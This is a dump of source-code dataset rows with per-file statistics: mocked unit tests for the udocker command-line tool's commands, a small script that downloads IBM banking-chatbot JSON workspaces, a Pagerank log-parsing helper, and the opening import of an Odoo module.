exeng_patch = patch("udocker.engine.proot.PRootEngine")
proot = exeng_patch.start()
mock_proot = Mock()
proot.return_value = mock_proot
argv = ["udocker", "run", "--location=/tmp/udocker", "ipyrad"]
cmdp = CmdParser()
cmdp.parse(argv)
mock_pull.return_value = None
mock_exec.return_value.get_engine.return_value = proot
proot.run.return_value = 0
udoc = UdockerCLI(self.local)
status = udoc.do_run(cmdp)
self.assertEqual(status, 0)
self.assertTrue(proot.run.called)
self.assertFalse(self.local.isprotected_container.called)
argv = ["udocker", "run", "ipyrad"]
cmdp = CmdParser()
cmdp.parse(argv)
self.local.get_container_id.return_value = ""
mock_pull.return_value = None
mock_exec.return_value.get_engine.return_value = proot
proot.run.return_value = 0
mock_chkimg.return_value = ("ipyrad", "latest")
self.local.cd_imagerepo.return_value = True
mock_create.return_value = "12345"
udoc = UdockerCLI(self.local)
status = udoc.do_run(cmdp)
self.assertEqual(status, 0)
self.assertTrue(self.local.get_container_id.called)
self.assertTrue(mock_chkimg.called)
self.assertTrue(self.local.cd_imagerepo.called)
self.assertTrue(mock_create.called)
exeng_patch.stop()
def test_24_do_images(self):
"""Test24 UdockerCLI().do_images()."""
argv = ["udocker", "-h"]
cmdp = CmdParser()
cmdp.parse(argv)
udoc = UdockerCLI(self.local)
status = udoc.do_images(cmdp)
self.assertEqual(status, 1)
argv = ["udocker", "images", "-l"]
cmdp = CmdParser()
cmdp.parse(argv)
self.local.get_imagerepos.return_value = [("img1", "tag1")]
self.local.isprotected_imagerepo.return_value = False
self.local.cd_imagerepo.return_value = "/img1"
self.local.get_layers.return_value = [("l1", 1024)]
udoc = UdockerCLI(self.local)
status = udoc.do_images(cmdp)
self.assertEqual(status, 0)
self.assertTrue(self.local.get_imagerepos.called)
self.assertTrue(self.local.isprotected_imagerepo.called)
self.assertTrue(self.local.cd_imagerepo.called)
self.assertTrue(self.local.get_layers.called)
@patch('udocker.cli.ExecutionMode')
def test_25_do_ps(self, mock_exec):
"""Test25 UdockerCLI().do_ps()."""
argv = ["udocker", "-h"]
cmdp = CmdParser()
cmdp.parse(argv)
udoc = UdockerCLI(self.local)
status = udoc.do_ps(cmdp)
self.assertEqual(status, 1)
exeng_patch = patch("udocker.engine.proot.PRootEngine")
proot = exeng_patch.start()
mock_proot = Mock()
proot.return_value = mock_proot
cdir = "/home/u1/.udocker/containers"
argv = ["udocker", "ps", "-m", "-s"]
cmdp = CmdParser()
cmdp.parse(argv)
self.local.get_containers_list.return_value = [[cdir, "/", "a"]]
mock_exec.return_value.get_engine.return_value = proot
self.local.isprotected_container.return_value = False
self.local.iswriteable_container.return_value = True
self.local.get_size.return_value = 1024
udoc = UdockerCLI(self.local)
status = udoc.do_ps(cmdp)
self.assertEqual(status, 0)
exeng_patch.stop()
@patch('udocker.cli.Msg')
def test_26_do_rm(self, mock_msg):
"""Test26 UdockerCLI().do_rm()."""
mock_msg.level = 0
argv = ["udocker", "-h"]
cmdp = CmdParser()
cmdp.parse(argv)
udoc = UdockerCLI(self.local)
status = udoc.do_rm(cmdp)
self.assertEqual(status, 1)
argv = ["udocker", "rm"]
cmdp = CmdParser()
cmdp.parse(argv)
udoc = UdockerCLI(self.local)
status = udoc.do_rm(cmdp)
self.assertEqual(status, 1)
self.assertFalse(self.local.get_container_id.called)
argv = ["udocker", "rm", "mycont"]
cmdp = CmdParser()
cmdp.parse(argv)
self.local.get_container_id.return_value = None
udoc = UdockerCLI(self.local)
status = udoc.do_rm(cmdp)
self.assertEqual(status, 1)
self.assertTrue(self.local.get_container_id.called)
self.assertFalse(self.local.isprotected_container.called)
argv = ["udocker", "rm", "mycont"]
cmdp = CmdParser()
cmdp.parse(argv)
self.local.get_container_id.return_value = "12345"
self.local.isprotected_container.return_value = True
udoc = UdockerCLI(self.local)
status = udoc.do_rm(cmdp)
self.assertEqual(status, 1)
self.assertTrue(self.local.isprotected_container.called)
self.assertFalse(self.local.del_container.called)
argv = ["udocker", "rm", "mycont"]
cmdp = CmdParser()
cmdp.parse(argv)
self.local.get_container_id.return_value = "12345"
self.local.isprotected_container.return_value = False
self.local.del_container.return_value = False
udoc = UdockerCLI(self.local)
status = udoc.do_rm(cmdp)
self.assertEqual(status, 1)
self.assertTrue(self.local.del_container.called)
argv = ["udocker", "rm", "mycont"]
cmdp = CmdParser()
cmdp.parse(argv)
self.local.get_container_id.return_value = "12345"
self.local.isprotected_container.return_value = False
self.local.del_container.return_value = True
udoc = UdockerCLI(self.local)
status = udoc.do_rm(cmdp)
self.assertEqual(status, 0)
@patch('udocker.cli.Msg')
@patch.object(UdockerCLI, '_check_imagespec')
def test_27_do_rmi(self, mock_chkimg, mock_msg):
"""Test27 UdockerCLI().do_rmi()."""
mock_msg.level = 0
argv = ["udocker", "-h"]
cmdp = CmdParser()
cmdp.parse(argv)
udoc = UdockerCLI(self.local)
status = udoc.do_rmi(cmdp)
self.assertEqual(status, 1)
argv = ["udocker", "rmi"]
cmdp = CmdParser()
cmdp.parse(argv)
mock_chkimg.return_value = ("", "latest")
udoc = UdockerCLI(self.local)
status = udoc.do_rmi(cmdp)
self.assertEqual(status, 1)
self.assertTrue(mock_chkimg.called)
self.assertFalse(self.local.isprotected_imagerepo.called)
argv = ["udocker", "rmi", "ipyrad"]
cmdp = CmdParser()
cmdp.parse(argv)
mock_chkimg.return_value = ("ipyrad", "latest")
self.local.isprotected_imagerepo.return_value = True
udoc = UdockerCLI(self.local)
status = udoc.do_rmi(cmdp)
self.assertEqual(status, 1)
self.assertTrue(self.local.isprotected_imagerepo.called)
self.assertFalse(self.local.del_imagerepo.called)
argv = ["udocker", "rmi", "ipyrad"]
cmdp = CmdParser()
cmdp.parse(argv)
mock_chkimg.return_value = ("ipyrad", "latest")
self.local.isprotected_imagerepo.return_value = False
self.local.del_imagerepo.return_value = False
udoc = UdockerCLI(self.local)
status = udoc.do_rmi(cmdp)
self.assertEqual(status, 1)
self.assertTrue(self.local.del_imagerepo.called)
argv = ["udocker", "rmi", "ipyrad"]
cmdp = CmdParser()
cmdp.parse(argv)
mock_chkimg.return_value = ("ipyrad", "latest")
self.local.isprotected_imagerepo.return_value = False
self.local.del_imagerepo.return_value = True
udoc = UdockerCLI(self.local)
status = udoc.do_rmi(cmdp)
self.assertEqual(status, 0)
self.assertTrue(self.local.del_imagerepo.called)
@patch('udocker.cli.Msg')
@patch.object(UdockerCLI, '_check_imagespec')
def test_28_do_protect(self, mock_chkimg, mock_msg):
"""Test28 UdockerCLI().do_protect()."""
mock_msg.level = 0
argv = ["udocker", "-h"]
cmdp = CmdParser()
cmdp.parse(argv)
udoc = UdockerCLI(self.local)
status = udoc.do_protect(cmdp)
self.assertEqual(status, 1)
self.assertFalse(self.local.get_container_id.called)
argv = ["udocker", "protect"]
cmdp = CmdParser()
cmdp.parse(argv)
self.local.get_container_id.return_value = False
mock_chkimg.return_value = ("", "latest")
udoc = UdockerCLI(self.local)
status = udoc.do_protect(cmdp)
self.assertEqual(status, 1)
self.assertTrue(self.local.get_container_id.called)
self.assertTrue(mock_chkimg.called)
self.assertFalse(self.local.protect_container.called)
self.assertFalse(self.local.protect_imagerepo.called)
argv = ["udocker", "protect", "ipyrad"]
cmdp = CmdParser()
cmdp.parse(argv)
self.local.get_container_id.return_value = False
mock_chkimg.return_value = ("", "latest")
udoc = UdockerCLI(self.local)
status = udoc.do_protect(cmdp)
self.assertEqual(status, 1)
argv = ["udocker", "protect", "ipyrad"]
cmdp = CmdParser()
cmdp.parse(argv)
self.local.get_container_id.return_value = False
self.local.protect_imagerepo.return_value = True
mock_chkimg.return_value = ("ipyrad", "latest")
udoc = UdockerCLI(self.local)
status = udoc.do_protect(cmdp)
self.assertEqual(status, 0)
self.assertTrue(self.local.protect_imagerepo.called)
argv = ["udocker", "protect", "ipyrad"]
cmdp = CmdParser()
cmdp.parse(argv)
self.local.get_container_id.return_value = True
self.local.protect_container.return_value = True
udoc = UdockerCLI(self.local)
status = udoc.do_protect(cmdp)
self.assertEqual(status, 0)
self.assertTrue(self.local.get_container_id.called)
self.assertTrue(self.local.protect_container.called)
argv = ["udocker", "protect", "ipyrad"]
cmdp = CmdParser()
cmdp.parse(argv)
self.local.get_container_id.return_value = True
self.local.protect_container.return_value = False
udoc = UdockerCLI(self.local)
status = udoc.do_protect(cmdp)
self.assertEqual(status, 1)
@patch('udocker.cli.Msg')
@patch.object(UdockerCLI, '_check_imagespec')
def test_29_do_unprotect(self, mock_chkimg, mock_msg):
"""Test29 UdockerCLI().do_unprotect()."""
mock_msg.level = 0
argv = ["udocker", "-h"]
cmdp = CmdParser()
cmdp.parse(argv)
udoc = UdockerCLI(self.local)
status = udoc.do_unprotect(cmdp)
self.assertEqual(status, 1)
self.assertFalse(self.local.get_container_id.called)
argv = ["udocker", "protect"]
cmdp = CmdParser()
cmdp.parse(argv)
self.local.get_container_id.return_value = False
mock_chkimg.return_value = ("", "latest")
udoc = UdockerCLI(self.local)
status = udoc.do_unprotect(cmdp)
self.assertEqual(status, 1)
self.assertTrue(self.local.get_container_id.called)
self.assertTrue(mock_chkimg.called)
self.assertFalse(self.local.unprotect_container.called)
self.assertFalse(self.local.unprotect_imagerepo.called)
argv = ["udocker", "protect", "ipyrad"]
cmdp = CmdParser()
cmdp.parse(argv)
self.local.get_container_id.return_value = False
mock_chkimg.return_value = ("", "latest")
udoc = UdockerCLI(self.local)
status = udoc.do_unprotect(cmdp)
self.assertEqual(status, 1)
argv = ["udocker", "protect", "ipyrad"]
cmdp = CmdParser()
cmdp.parse(argv)
self.local.get_container_id.return_value = False
self.local.unprotect_imagerepo.return_value = True
mock_chkimg.return_value = ("ipyrad", "latest")
udoc = UdockerCLI(self.local)
status = udoc.do_unprotect(cmdp)
self.assertEqual(status, 0)
self.assertTrue(self.local.unprotect_imagerepo.called)
argv = ["udocker", "protect", "ipyrad"]
cmdp = CmdParser()
cmdp.parse(argv)
self.local.get_container_id.return_value = True
self.local.unprotect_container.return_value = True
udoc = UdockerCLI(self.local)
status = udoc.do_unprotect(cmdp)
self.assertEqual(status, 0)
self.assertTrue(self.local.get_container_id.called)
self.assertTrue(self.local.unprotect_container.called)
argv = ["udocker", "protect", "ipyrad"]
cmdp = CmdParser()
cmdp.parse(argv)
self.local.get_container_id.return_value = True
self.local.unprotect_container.return_value = False
udoc = UdockerCLI(self.local)
status = udoc.do_unprotect(cmdp)
self.assertEqual(status, 1)
@patch('udocker.cli.Msg')
def test_30_do_name(self, mock_msg):
"""Test30 UdockerCLI().do_name()."""
mock_msg.level = 0
argv = ["udocker", "-h"]
cmdp = CmdParser()
cmdp.parse(argv)
udoc = UdockerCLI(self.local)
status = udoc.do_name(cmdp)
self.assertEqual(status, 1)
argv = ["udocker", "name"]
cmdp = CmdParser()
cmdp.parse(argv)
self.local.get_container_id.return_value = False
udoc = UdockerCLI(self.local)
status = udoc.do_name(cmdp)
self.assertEqual(status, 1)
self.assertTrue(self.local.get_container_id.called)
self.assertFalse(self.local.set_container_name.called)
argv = ["udocker", "name", "12345", "mycont"]
cmdp = CmdParser()
cmdp.parse(argv)
self.local.get_container_id.return_value = True
self.local.set_container_name.return_value = False
udoc = UdockerCLI(self.local)
status = udoc.do_name(cmdp)
self.assertEqual(status, 1)
self.assertTrue(self.local.set_container_name.called)
argv = ["udocker", "name", "12345", "mycont"]
cmdp = CmdParser()
cmdp.parse(argv)
self.local.get_container_id.return_value = True
self.local.set_container_name.return_value = True
udoc = UdockerCLI(self.local)
status = udoc.do_name(cmdp)
self.assertEqual(status, 0)
@patch('udocker.cli.Msg')
def test_31_do_rename(self, mock_msg):
"""Test31 UdockerCLI().do_rename()."""
mock_msg.level = 0
argv = ["udocker", "-h"]
cmdp = CmdParser()
cmdp.parse(argv)
udoc = UdockerCLI(self.local)
status = udoc.do_rename(cmdp)
self.assertEqual(status, 1)
argv = ["udocker", "rename", "contname", "newname"]
cmdp = CmdParser()
cmdp.parse(argv)
self.local.get_container_id.side_effect = ["", ""]
udoc = UdockerCLI(self.local)
status = udoc.do_rename(cmdp)
self.assertEqual(status, 1)
self.assertTrue(self.local.get_container_id.called)
argv = ["udocker", "rename", "contname", "newname"]
cmdp = CmdParser()
cmdp.parse(argv)
self.local.get_container_id.side_effect = ["123", "543"]
udoc = UdockerCLI(self.local)
status = udoc.do_rename(cmdp)
self.assertEqual(status, 1)
self.assertTrue(self.local.get_container_id.called)
argv = ["udocker", "rename", "contname", "newname"]
cmdp = CmdParser()
cmdp.parse(argv)
self.local.get_container_id.side_effect = ["123", ""]
self.local.del_container_name.return_value = False
udoc = UdockerCLI(self.local)
status = udoc.do_rename(cmdp)
self.assertEqual(status, 1)
self.assertTrue(self.local.del_container_name.called)
self.assertFalse(self.local.set_container_name.called)
argv = ["udocker", "rename", "contname", "newname"]
cmdp = CmdParser()
cmdp.parse(argv)
self.local.get_container_id.side_effect = ["123", ""]
self.local.del_container_name.return_value = True
self.local.set_container_name.side_effect = [False, True]
udoc = UdockerCLI(self.local)
status = udoc.do_rename(cmdp)
self.assertEqual(status, 1)
self.assertTrue(self.local.set_container_name.called)
argv = ["udocker", "rename", "contname", "newname"]
cmdp = CmdParser()
cmdp.parse(argv)
self.local.get_container_id.side_effect = ["123", ""]
self.local.del_container_name.return_value = True
self.local.set_container_name.side_effect = [True, True]
udoc = UdockerCLI(self.local)
status = udoc.do_rename(cmdp)
self.assertEqual(status, 0)
self.assertTrue(self.local.set_container_name.called)
@patch('udocker.cli.Msg')
def test_32_do_rmname(self, mock_msg):
"""Test32 UdockerCLI().do_rmname()."""
mock_msg.level = 0
argv = ["udocker", "-h"]
cmdp = CmdParser()
cmdp.parse(argv)
udoc = UdockerCLI(self.local)
status = udoc.do_rmname(cmdp)
self.assertEqual(status, 1)
argv = ["udocker", "rmname"]
cmdp = CmdParser()
cmdp.parse(argv)
udoc = UdockerCLI(self.local)
status = udoc.do_rmname(cmdp)
self.assertEqual(status, 1)
self.assertFalse(self.local.del_container_name.called)
argv = ["udocker", "rmname", "contname"]
cmdp = CmdParser()
cmdp.parse(argv)
self.local.del_container_name.return_value = False
udoc = UdockerCLI(self.local)
status = udoc.do_rmname(cmdp)
self.assertEqual(status, 1)
self.assertTrue(self.local.del_container_name.called)
argv = ["udocker", "rmname", "contname"]
cmdp = CmdParser()
cmdp.parse(argv)
self.local.del_container_name.return_value = True
udoc = UdockerCLI(self.local)
status = udoc.do_rmname(cmdp)
self.assertEqual(status, 0)
self.assertTrue(self.local.del_container_name.called)
@patch.object(UdockerCLI, '_check_imagespec')
@patch('udocker.cli.json.dumps')
@patch('udocker.cli.ContainerStructure.get_container_attr')
@patch('udocker.cli.Msg')
def test_33_do_inspect(self, mock_msg, mock_csattr, mock_jdump,
mock_chkimg):
"""Test33 UdockerCLI().do_inspect()."""
cont_insp = \
{
"architecture": "amd64",
"config": {
"AttachStderr": False,
"AttachStdin": False,
"AttachStdout": False,
"Cmd": [
"/bin/bash"
],
"Domainname": "",
"Entrypoint": None,
"Env": [
"PATH=/usr/local/sbin"
],
"Hostname": "",
"Image": "sha256:05725a",
"Labels": {
"org.opencontainers.image.vendor": "CentOS"
},
"WorkingDir": ""
},
"container": "c171c",
"container_config": {
"ArgsEscaped": True,
"Cmd": ["/bin/sh", "-c"],
"Domainname": "",
"Env": [
"PATH=/usr/local/sbin"
],
"Hostname": "c171c5a1528a",
"Image": "sha256:05725a",
"Labels": {
"org.label-schema.license": "GPLv2",
"org.label-schema.name": "CentOS Base Image",
"org.opencontainers.image.vendor": "CentOS"
},
"WorkingDir": ""
},
"created": "2020-05-05T21",
"docker_version": "18.09.7",
"id": "e72c1",
"os": "linux",
"parent": "61dc7"
}
mock_msg.level = 0
argv = ["udocker", "-h"]
cmdp = CmdParser()
cmdp.parse(argv)
self.local.get_container_id.return_value = ""
udoc = UdockerCLI(self.local)
status = udoc.do_inspect(cmdp)
self.assertEqual(status, 1)
argv = ["udocker", "inspect"]
cmdp = CmdParser()
cmdp.parse(argv)
self.local.get_container_id.return_value = ""
mock_chkimg.return_value = ("", "latest")
self.local.cd_imagerepo.return_value = False
udoc = UdockerCLI(self.local)
status = udoc.do_inspect(cmdp)
self.assertEqual(status, 1)
argv = ["udocker", "inspect"]
cmdp = CmdParser()
cmdp.parse(argv)
self.local.get_container_id.return_value = ""
mock_chkimg.return_value = ("ipyrad", "latest")
self.local.cd_imagerepo.return_value = True
self.local.get_image_attributes.return_value = (cont_insp, "")
mock_jdump.return_value = cont_insp
udoc = UdockerCLI(self.local)
status = udoc.do_inspect(cmdp)
self.assertEqual(status, 0)
argv = ["udocker", "inspect", "-p", "123"]
cmdp = CmdParser()
cmdp.parse(argv)
self.local.get_container_id.return_value = "123"
mock_chkimg.return_value = ("ipyrad", "latest")
self.local.cd_imagerepo.return_value = True
self.local.get_image_attributes.return_value = (cont_insp, "")
mock_csattr.return_value = ("/ROOT/cont", cont_insp)
mock_jdump.return_value = cont_insp
udoc = UdockerCLI(self.local)
status = udoc.do_inspect(cmdp)
self.assertEqual(status, 0)
@patch.object(UdockerCLI, '_check_imagespec')
@patch('udocker.cli.Msg')
def test_34_do_verify(self, mock_msg, mock_chkimg):
"""Test34 UdockerCLI().do_verify()."""
mock_msg.level = 0
argv = ["udocker", "-h"]
cmdp = CmdParser()
cmdp.parse(argv)
mock_chkimg.return_value = ("ipyrad", "latest")
udoc = UdockerCLI(self.local)
status = udoc.do_verify(cmdp)
self.assertEqual(status, 1)
argv = ["udocker", "verify", "ipyrad"]
cmdp = CmdParser()
cmdp.parse(argv)
mock_chkimg.return_value = ("ipyrad", "latest")
self.local.cd_imagerepo.return_value = False
udoc = UdockerCLI(self.local)
status = udoc.do_verify(cmdp)
self.assertEqual(status, 1)
argv = ["udocker", "verify", "ipyrad"]
cmdp = CmdParser()
cmdp.parse(argv)
mock_chkimg.return_value = ("ipyrad", "latest")
self.local.cd_imagerepo.return_value = True
self.local.verify_image.return_value = True
udoc = UdockerCLI(self.local)
status = udoc.do_verify(cmdp)
self.assertEqual(status, 0)
@patch('udocker.cli.ExecutionMode')
@patch('udocker.cli.NvidiaMode')
@patch('udocker.cli.FileUtil.rchmod')
@patch('udocker.cli.Unshare.namespace_exec')
@patch('udocker.cli.MountPoint')
@patch('udocker.cli.FileBind')
@patch('udocker.cli.Msg')
def test_35_do_setup(self, mock_msg, mock_fb, mock_mp,
mock_unshr, mock_furchmod, mock_nv, mock_execm):
"""Test35 UdockerCLI().do_setup()."""
mock_msg.level = 0
argv = ["udocker", "-h"]
cmdp = CmdParser()
cmdp.parse(argv)
udoc = UdockerCLI(self.local)
status = udoc.do_setup(cmdp)
self.assertEqual(status, 1)
argv = ["udocker", "setup"]
cmdp = CmdParser()
cmdp.parse(argv)
self.local.cd_container.return_value = ""
udoc = UdockerCLI(self.local)
status = udoc.do_setup(cmdp)
self.assertEqual(status, 1)
self.assertTrue(self.local.cd_container.called)
argv = ["udocker", "setup", "--execmode=P2", "mycont"]
cmdp = CmdParser()
cmdp.parse(argv)
self.local.cd_container.return_value = "/ROOT/cont1"
self.local.isprotected_container.return_value = True
udoc = UdockerCLI(self.local)
status = udoc.do_setup(cmdp)
self.assertEqual(status, 1)
self.assertTrue(self.local.isprotected_container.called)
argv = ["udocker", "setup", "--execmode=P2",
"--purge", "--fixperm", "--nvidia", "mycont"]
cmdp = CmdParser()
cmdp.parse(argv)
self.local.cd_container.return_value = "/ROOT/cont1"
self.local.isprotected_container.return_value = False
mock_msg.level = 0
mock_fb.return_value.restore.return_value = None
mock_mp.return_value.restore.return_value = None
mock_unshr.return_value = None
mock_furchmod.return_value = None
mock_nv.return_value.set_mode.return_value = None
mock_execm.return_value.set_mode.return_value = True
udoc = UdockerCLI(self.local)
status = udoc.do_setup(cmdp)
self.assertEqual(status, 0)
self.assertTrue(mock_fb.return_value.restore.called)
self.assertTrue(mock_mp.return_value.restore.called)
self.assertTrue(mock_unshr.called)
self.assertTrue(mock_furchmod.called)
self.assertTrue(mock_nv.return_value.set_mode.called)
self.assertTrue(mock_execm.return_value.set_mode.called)
argv = ["udocker", "setup", "--execmode=P2",
"--purge", "--fixperm", "--nvidia", "mycont"]
cmdp = CmdParser()
cmdp.parse(argv)
self.local.cd_container.return_value = "/ROOT/cont1"
self.local.isprotected_container.return_value = False
mock_msg.level = 0
mock_fb.return_value.restore.return_value = None
mock_mp.return_value.restore.return_value = None
mock_unshr.return_value = None
mock_furchmod.return_value = None
mock_nv.return_value.set_mode.return_value = None
mock_execm.return_value.set_mode.return_value = False
udoc = UdockerCLI(self.local)
status = udoc.do_setup(cmdp)
self.assertEqual(status, 1)
argv = ["udocker", "setup", "mycont"]
cmdp = CmdParser()
cmdp.parse(argv)
self.local.cd_container.return_value = "/ROOT/cont1"
self.local.isprotected_container.return_value = False
udoc = UdockerCLI(self.local)
status = udoc.do_setup(cmdp)
self.assertEqual(status, 0)
@patch('udocker.cli.UdockerTools')
@patch('udocker.cli.Msg')
def test_36_do_install(self, mock_msg, mock_utools):
"""Test36 UdockerCLI().do_install()."""
mock_msg.level = 0
argv = ["udocker", "-h"]
cmdp = CmdParser()
cmdp.parse(argv)
udoc = UdockerCLI(self.local)
status = udoc.do_install(cmdp)
self.assertEqual(status, 1)
argv = ["udocker", "install", "--force", "--purge"]
cmdp = CmdParser()
cmdp.parse(argv)
mock_utools.return_value.purge.return_value = None
mock_utools.return_value.install.return_value = False
udoc = UdockerCLI(self.local)
status = udoc.do_install(cmdp)
self.assertEqual(status, 1)
argv = ["udocker", "install", "--force", "--purge"]
cmdp = CmdParser()
cmdp.parse(argv)
mock_utools.return_value.purge.return_value = None
mock_utools.return_value.install.return_value = True
udoc = UdockerCLI(self.local)
status = udoc.do_install(cmdp)
self.assertEqual(status, 0)
@patch('udocker.cli.Msg')
def test_37_do_showconf(self, mock_msg):
"""Test37 UdockerCLI().do_showconf()."""
mock_msg.level = 0
argv = ["udocker", "-h"]
cmdp = CmdParser()
cmdp.parse(argv)
udoc = UdockerCLI(self.local)
status = udoc.do_showconf(cmdp)
self.assertEqual(status, 1)
self.assertFalse(mock_msg.return_value.out.called)
argv = ["udocker", "showconf"]
cmdp = CmdParser()
cmdp.parse(argv)
udoc = UdockerCLI(self.local)
status = udoc.do_showconf(cmdp)
self.assertEqual(status, 0)
self.assertTrue(mock_msg.return_value.out.called)
@patch('udocker.cli.Msg')
def test_38_do_version(self, mock_msg):
"""Test38 UdockerCLI().do_version()."""
mock_msg.level = 0
argv = ["udocker", "-h"]
cmdp = CmdParser()
cmdp.parse(argv)
udoc = UdockerCLI(self.local)
status = udoc.do_version(cmdp)
self.assertEqual(status, 1)
self.assertFalse(mock_msg.return_value.out.called)
argv = ["udocker", "version"]
cmdp = CmdParser()
cmdp.parse(argv)
udoc = UdockerCLI(self.local)
status = udoc.do_version(cmdp)
self.assertEqual(status, 0)
self.assertTrue(mock_msg.return_value.out.called)
@patch('udocker.cli.Msg')
def test_39_do_help(self, mock_msg):
"""Test39 UdockerCLI().do_help()."""
mock_msg.level = 0
argv = ["udocker", "-h"]
cmdp = CmdParser()
cmdp.parse(argv)
udoc = UdockerCLI(self.local)
status = udoc.do_help(cmdp)
self.assertEqual(status, 0)
self.assertTrue(mock_msg.return_value.out.called)
if __name__ == '__main__':
main()
| 37.673575
| 78
| 0.605006
| 6,537
| 58,168
| 5.189689
| 0.063179
| 0.072424
| 0.071688
| 0.085424
| 0.841002
| 0.811997
| 0.784967
| 0.761916
| 0.732763
| 0.709742
| 0
| 0.012553
| 0.265919
| 58,168
| 1,543
| 79
| 37.697991
| 0.781944
| 0.043031
| 0
| 0.773854
| 0
| 0
| 0.102642
| 0.026603
| 0
| 0
| 0
| 0
| 0.190834
| 1
| 0.02855
| false
| 0.002254
| 0.013524
| 0
| 0.042825
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9bafc9ec68419712b433153d458d6848e4f33991
| 376
|
py
|
Python
|
dataset/download_datset.py
|
HrishikV/Ineuron_bankbot_internship
|
eb044d0047e2ad3cb6c9e69476e23bab7f6074be
|
[
"MIT"
] | null | null | null |
dataset/download_datset.py
|
HrishikV/Ineuron_bankbot_internship
|
eb044d0047e2ad3cb6c9e69476e23bab7f6074be
|
[
"MIT"
] | null | null | null |
dataset/download_datset.py
|
HrishikV/Ineuron_bankbot_internship
|
eb044d0047e2ad3cb6c9e69476e23bab7f6074be
|
[
"MIT"
] | null | null | null |
import wget
urls=["https://github.com/IBM/watson-banking-chatbot/blob/master/data/conversation/workspaces/full_banking.json","https://github.com/IBM/watson-banking-chatbot/blob/master/data/conversation/workspaces/banking_US.json","https://github.com/IBM/watson-banking-chatbot/blob/master/data/conversation/workspaces/banking_IN.json"]
for url in urls:
wget.download(url)
| 75.2
| 323
| 0.808511
| 55
| 376
| 5.472727
| 0.4
| 0.109635
| 0.139535
| 0.169435
| 0.800664
| 0.800664
| 0.800664
| 0.800664
| 0.800664
| 0.800664
| 0
| 0
| 0.031915
| 376
| 4
| 324
| 94
| 0.826923
| 0
| 0
| 0
| 0
| 0.75
| 0.819149
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.25
| 0
| 0.25
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
32fed326af77f36144008b6d3f9ec24de1e6c69a
| 2,060
|
py
|
Python
|
scripts/helpers.py
|
nicktheway/Pagerank
|
ff57072deabca020548cd7fcc9f3c5a857f438ed
|
[
"MIT"
] | null | null | null |
scripts/helpers.py
|
nicktheway/Pagerank
|
ff57072deabca020548cd7fcc9f3c5a857f438ed
|
[
"MIT"
] | null | null | null |
scripts/helpers.py
|
nicktheway/Pagerank
|
ff57072deabca020548cd7fcc9f3c5a857f438ed
|
[
"MIT"
] | null | null | null |
import numpy as np
import os
def loadParallelLogData(log_file):
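"""Parse a parallel-run Pagerank log.
Returns (dataPath, loadToCrsTime, makeStochasticTime, colorTime,
colorGroups, iterationTimes, errorProgression); header fields come
from fixed line positions, iteration data from "Iteration:" lines.
"""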
with open(log_file, "r") as f:
logLines = f.readlines()
iterationTimes = []
errorProgression = []
i = 0
for line in logLines:
a = line.split()
if i == 0:
dataPath = a[1]
elif i == 1:
loadToCrsTime = a[4]
elif i == 2:
colorGroups = a[2]
elif i == 3:
colorTime = a[6]
elif i == 5:
makeStochasticTime = a[4]
if a[0] == "Iteration:":
iterationTimes.append(a[1])
errorProgression.append(a[5])
i += 1
loadToCrsTime = float(loadToCrsTime)
makeStochasticTime = float(makeStochasticTime)
colorTime = float(colorTime)
colorGroups = int(colorGroups)
iterationTimes = np.asarray(list(map(float, iterationTimes)))
errorProgression = np.asarray(list(map(float, errorProgression)))
dataPath = os.path.basename(dataPath)
dataPath = os.path.splitext(dataPath)[0]
return dataPath, loadToCrsTime, makeStochasticTime, colorTime, colorGroups, iterationTimes, errorProgression
def loadSerialLogData(log_file):
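"""Parse a serial-run Pagerank log.
Same fixed-position header parsing as loadParallelLogData, minus the
coloring fields that only the parallel runs emit.
"""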
with open(log_file, "r") as f:
logLines = f.readlines()
iterationTimes = []
errorProgression = []
i = 0
for line in logLines:
a = line.split()
if i == 0:
dataPath = a[1]
elif i == 1:
loadToCrsTime = a[4]
elif i == 3:
makeStochasticTime = a[4]
if a[0] == "Iteration:":
iterationTimes.append(a[1])
errorProgression.append(a[5])
i += 1
loadToCrsTime = float(loadToCrsTime)
makeStochasticTime = float(makeStochasticTime)
iterationTimes = np.asarray(list(map(float, iterationTimes)))
errorProgression = np.asarray(list(map(float, errorProgression)))
dataPath = os.path.basename(dataPath)
dataPath = os.path.splitext(dataPath)[0]
return dataPath, loadToCrsTime, makeStochasticTime, iterationTimes, errorProgression
| 29.855072
| 112
| 0.603398
| 214
| 2,060
| 5.78972
| 0.228972
| 0.145278
| 0.048426
| 0.051655
| 0.813559
| 0.813559
| 0.813559
| 0.813559
| 0.813559
| 0.813559
| 0
| 0.019061
| 0.286893
| 2,060
| 69
| 113
| 29.855072
| 0.82437
| 0
| 0
| 0.793103
| 0
| 0
| 0.010674
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.034483
| false
| 0
| 0.034483
| 0
| 0.103448
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fd28a4fb788654663de19ce47d0ff089a0fa475a
| 31,947
|
py
|
Python
|
hanibal/ans_escuela/asignacion_descuento.py
|
Christian-Castro/castro_odoo8
|
8247fdb20aa39e043b6fa0c4d0af509462ab3e00
|
[
"Unlicense"
] | null | null | null |
hanibal/ans_escuela/asignacion_descuento.py
|
Christian-Castro/castro_odoo8
|
8247fdb20aa39e043b6fa0c4d0af509462ab3e00
|
[
"Unlicense"
] | null | null | null |
hanibal/ans_escuela/asignacion_descuento.py
|
Christian-Castro/castro_odoo8
|
8247fdb20aa39e043b6fa0c4d0af509462ab3e00
|
[
"Unlicense"
] | null | null | null |
# -*- coding: utf-8 -*-
from openerp import models, fields, api, _
